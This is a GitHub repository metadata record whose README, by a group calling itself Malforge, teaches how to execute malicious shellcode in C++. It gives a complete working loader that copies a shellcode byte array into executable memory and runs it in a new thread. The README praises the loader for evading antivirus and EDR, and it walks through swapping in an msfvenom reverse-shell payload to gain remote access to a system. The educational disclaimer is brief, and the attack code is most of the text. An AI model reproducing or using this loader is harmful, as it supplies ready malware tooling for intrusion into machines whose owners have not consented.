{"id":27599658,"url":"https://github.com/malforge-maldev-public-organization/executing-shellcode-introduction","last_synced_at":"2025-07-19T16:02:36.148Z","repository":{"id":289008955,"uuid":"969811652","full_name":"Malforge-Maldev-Public-Organization/Executing-ShellCode-Introduction","owner":"Malforge-Maldev-Public-Organization","description":"A guide on how to executing Malicious Shell-Code with C++","archived":false,"fork":false,"pushed_at":"2025-04-21T01:58:29.000Z","size":4,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-04-22T15:50:38.689Z","etag":null,"topics":["injection-attacks","malicious","malware-analysis","redteaming","shellcode"],"latest_commit_sha":null,"homepage":"https://malforge-group.in/","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Malforge-Maldev-Public-Organization.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-04-21T01:10:20.000Z","updated_at":"2025-04-21T02:02:53.000Z","dependencies_parsed_at":"2025-04-21T13:01:29.361Z","dependency_job_id":null,"html_url":"https://github.com/Malforge-Maldev-Public-Organization/Executing-ShellCode-Introduction","commit_stats":null,"previous_names":["malforge-maldev-public-organization/executing-shellcode-introduction"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Malforge-Maldev-Public-Organization/Executing-ShellCode-Introduction","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Malforge-Maldev-Public-Organization%2FExecuting-ShellCode-Introduction","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Malforge-Maldev-Public-Organization%2FExecuting-ShellCode-Introduction/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Malforge-Maldev-Public-Organization%2FExecuting-ShellCode-Introduction/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Malforge-Maldev-Public-Organization%2FExecuting-ShellCode-Introduction/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Malforge-Maldev-Public-Organization","download_url":"https://codeload.github.com/Malforge-Maldev-Public-Organization/Executing-ShellCode-Introduction/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Malforge-Maldev-Public-Organization%2FExecuting-ShellCode-Introduction/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":262198277,"owners_count":23273825,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["injection-attacks","malicious","malware-analysis","redteaming","shellcode"],"created_at":"2025-04-22T15:40:46.537Z","updated_at":"2025-06-27T05:32:57.166Z","avatar_url":"https://github.com/Malforge-Maldev-Public-Organization.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# Executing Shellcode with C++\n\n## Introduction\n\nHello everyone, today I am going to teach you how to execute malicious shellcode with C++.\n\n## Why Use Shellcode?\n\nShellcode is often used in scenarios where:\n\n- **Stealth is critical** — It avoids writing to disk.\n- **AV/EDR evasion** — Memory-resident payloads are harder to detect.\n- **Precise control** over execution — You're writing and executing memory buffers directly.\n\n![image](https://github.com/user-attachments/assets/86729f34-8ff9-4a2d-b637-7fb9dbb26312)\n\n## The Payload: `calc.exe`\n\nWe'll use a shellcode payload that spawns the calculator (`calc.exe`). This is commonly used as a proof-of-concept (PoC) for demonstrating shellcode execution.\n\n---\n\n## Full C++ Code\n\n```cpp\n#include \u003cwindows.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003cstring.h\u003e\n\nunsigned char my_payload[] = {\n  0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51,\n  0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52,\n  0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72,\n  0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,\n  0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,\n  0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b,\n  0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,\n  0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44,\n  0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41,\n  0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,\n  0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1,\n  0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44,\n  0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44,\n  0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01,\n  0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,\n  0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41,\n  0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48,\n  0xba, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d,\n  0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5,\n  0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,\n  0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0,\n  0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89,\n  0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x00\n};\nunsigned int my_payload_len = sizeof(my_payload);\n\nint main(void) {\n  void * my_payload_mem; // memory buffer for payload\n  BOOL rv;\n  HANDLE th;\n  DWORD oldprotect = 0;\n\n  my_payload_mem = VirtualAlloc(0, my_payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n\n  RtlMoveMemory(my_payload_mem, my_payload, my_payload_len);\n\n  rv = VirtualProtect(my_payload_mem, my_payload_len, PAGE_EXECUTE_READ, \u0026oldprotect);\n  if ( rv != 0 ) {\n\n    th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) my_payload_mem, 0, 0, 0);\n    WaitForSingleObject(th, -1);\n  }\n  return 0;\n}\n```\n\n## Proof of Concept (PoC)\nTo illustrate this technique, we can use a reverse shell payload created with **MSFvenom in C format**. Follow these steps:\n\nGenerate Shellcode: Use **MSFvenom** to create a reverse shell payload and format it as a C array.\n\n![image](https://github.com/user-attachments/assets/85592f72-2ddc-4519-9cc3-08d74ce71fb4)\n\nInsert Payload: Update the payload array in the code with the generated shellcode.\n\n![image](https://github.com/user-attachments/assets/6b98ec6a-2354-4368-aa05-9a837c830605)\n\nCompile and Run: Compile the C++ code into an executable (EXE) and run it to initiate the reverse shell.\n\n![image](https://github.com/user-attachments/assets/94d3293c-b47c-4738-9fdf-df5b33aa8526)\n\n![image](https://github.com/user-attachments/assets/4c2e683e-2659-4eff-ac64-034babac6d7c)\n\nUpon running the EXE, the reverse shell connects, granting remote access to the system\n\n![image](https://github.com/user-attachments/assets/087d4378-0658-4b46-80d2-f45b4203ab91)\n\n![image](https://github.com/user-attachments/assets/a6e2233f-c24a-45d8-8c19-cee4358c0066)\n\n## Conclusion\n\nThis guide covered how to execute shellcode in C++ and highlighted its stealth advantages. By running code in memory, shellcode can bypass many standard security measures. I hope this article was insightful and helped you understand shellcode execution.\n\n\u003e ⚠️ **Disclaimer:**  \n\u003e This code is for **educational purposes only**. Executing shellcode can be **highly dangerous** and may trigger antivirus alerts or cause system instability.  \n\u003e Do **not** run this code on production machines or without proper knowledge.  \n\u003e Always conduct experiments in **isolated environments** such as virtual machines or sandboxes.\n---\n\nThank you for reading!\n\n— **Malforge Group**\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmalforge-maldev-public-organization%2Fexecuting-shellcode-introduction","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmalforge-maldev-public-organization%2Fexecuting-shellcode-introduction","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmalforge-maldev-public-organization%2Fexecuting-shellcode-introduction/lists"}